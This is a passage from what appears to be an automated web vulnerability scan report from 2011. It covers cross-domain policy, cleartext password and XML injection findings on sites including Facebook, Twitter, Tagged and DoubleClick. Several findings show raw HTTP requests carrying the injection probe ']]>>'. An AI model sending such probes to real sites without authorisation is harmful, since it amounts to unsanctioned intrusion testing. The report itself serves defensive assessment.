<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.39. https://secure-static.tagged.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure-static.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-static.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:39:50 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:13:44 GMT
ETag: "7f6b18-1d7-49f3cc2ecde00"
Accept-Ranges: bytes
Content-Length: 471
Cache-Control: max-age=2592000
Expires: Tue, 14 Jun 2011 18:39:50 GMT
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com" />
<allow-access-from domain="*.tagged.com" />
...[SNIP]...

5.40. http://secure.tagged.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://secure.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:39:37 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "1e6f19-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

5.41. https://secure.tagged.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:36:00 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "1e6f19-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

5.42. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.245.35
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.43. http://www.tagged.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:30 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "1e6f19-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

5.44. http://www.orcon.net.nz/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orcon.net.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orcon.net.nz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:23:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
Last-Modified: Wed, 05 Aug 2009 03:37:16 GMT
ETag: "174003-104-4705cb82b7300"
Accept-Ranges: bytes
Content-Length: 260
Vary: Accept-Encoding
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="test.orcon.net.nz" />
<allow-access-from domain="internal.orcon.net.nz" />
<allow-access-from domain="orcon.dev" /> <!-- Ga
...[SNIP]...

6. Silverlight cross-domain policy
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 15 May 2011 18:35:46 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:121c"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 15 May 2011 18:35:47 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 18:23:54 GMT
Date: Sun, 15 May 2011 18:23:54 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.4. http://player.ooyala.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 25 Apr 2011 02:53:37 GMT
Content-Type: text/xml
Date: Sun, 15 May 2011 18:38:16 GMT
Content-Length: 362
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*" http-request-headers="*">
<domain uri="*"/>
</allow-fr
...[SNIP]...

6.5. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 18:35:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://webmail.vtr.net/

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.vtr.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET / HTTP/1.1
Host: webmail.vtr.net
Proxy-Connection: keep-alive
Referer: http://vtr.com/vtr.com/concursos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17647
Connection: keep-alive
Date: Sun, 15 May 2011 18:24:56 GMT
Content-Type: text/html;charset=iso-8859-1
Server: CommuniGatePro/5.1.16

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Webmail VTR</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="http://vtr.com/css/vtrHome2008.
...[SNIP]...
<td colspan="2" class="BgCaja" background="http://vtr.com/cgp/images/bg_caja.jpg">
    <FORM name="f1" method=post enctype="multipart/form-data" action="/" onsubmit="return conc1()">
        <INPUT type=hidden name="FormCharset" value="iso-8859-1">
...[SNIP]...
<td height="20">
           <INPUT NAME="Password" Type=password class="input" size=10 MaxLength=99 ALT="Contrase.a">
</td>
...[SNIP]...

7.2. http://webmail.vtr.net/

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.vtr.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET / HTTP/1.1
Host: webmail.vtr.net
Proxy-Connection: keep-alive
Referer: http://vtr.com/vtr.com/concursos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17647
Connection: keep-alive
Date: Sun, 15 May 2011 18:24:56 GMT
Content-Type: text/html;charset=iso-8859-1
Server: CommuniGatePro/5.1.16

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Webmail VTR</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="http://vtr.com/css/vtrHome2008.
...[SNIP]...
<td colspan="2" align="left" valign="top" class="BgCaja" background="http://vtr.com/cgp/images/bg_caja.jpg">
    <FORM name="f2" method=post enctype="multipart/form-data" action="/" onSubmit="return conc2()">
        <INPUT type=hidden name="FormCharset" value="iso-8859-1">
...[SNIP]...
<td height="20">
<INPUT class="input" NAME="Password" Type=password size=10 MaxLength=99 ALT="Contrase.a">
</td>
...[SNIP]...

7.3. http://www.kol.co.nz/account.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /account.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /account.php HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 7464
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<!-- Dial-up Login -->
           <form method="post" action="http://accounts.kol.co.nz/customers/login.asp?return=index.asp" class="d_box">
               <h3>
...[SNIP]...
<span class="element"><input type="password" name="password" id="dupassword" /></span>
...[SNIP]...

7.4. http://www.kol.co.nz/payment/credit.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /payment/credit.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /payment/credit.php HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 6420
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<!-- Account Login -->
                   <form method="post" action="http://accounts.kol.co.nz/customers/login.asp?return=index.asp" class="box">
                   
                       <div class="boxcontent">
...[SNIP]...
<span class="element"><input type="password" name="password" id="dupassword" /></span>
...[SNIP]...

7.5. http://www.kol.co.nz/webmail.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /webmail.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /webmail.php HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 5157
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<!-- Webmail Login -->
               <form method="post" action="http://accounts.kol.co.nz/customers/login.asp?return=index.asp" class="box">

                   <div class="boxcontent">
...[SNIP]...
<span class="element"><input type="password" name="password" id="dupassword" /></span>
...[SNIP]...

8. XML injection
There are 94 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


8.1. http://api.facebook.com/restserver.php [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Ftweetbeat.com%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 15 May 2011 13:06:12 -0700
Pragma:
X-FB-Rev: 378427
X-FB-Server: 10.42.67.33
X-Cnection: close
Date: Sun, 15 May 2011 20:04:12 GMT
Content-Length: 738

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

8.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /anywhere.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /anywhere.js]]>>?id=YAOsk5VXuUFZdZMx60TxFw&v=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 280
Date: Sun, 15 May 2011 20:01:18 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>anywhere.js]]&gt;&gt;</Key><RequestId>3EDCD4B7EBABA582</RequestId><HostId>K
...[SNIP]...

8.3. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1305489673664&count=horizontal&lang=en&text=The%20Pulse%20of%20Social%20Life%20-%20Live%20tweets&url=http%3A%2F%2Ftweetbeat.com HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sun, 15 May 2011 20:01:35 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>739FBFE2E464E540</Reque
...[SNIP]...

8.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/tweet_button.html]]>>?_=1305489673664&count=horizontal&lang=en&text=The%20Pulse%20of%20Social%20Life%20-%20Live%20tweets&url=http%3A%2F%2Ftweetbeat.com HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sun, 15 May 2011 20:01:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]&gt;&gt;</Key><RequestId>BAF830570318C1DF</Reque
...[SNIP]...

8.5. http://s3.amazonaws.com/tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/large/17612/thunder%20grizz%20g7.jpg

Issue detail

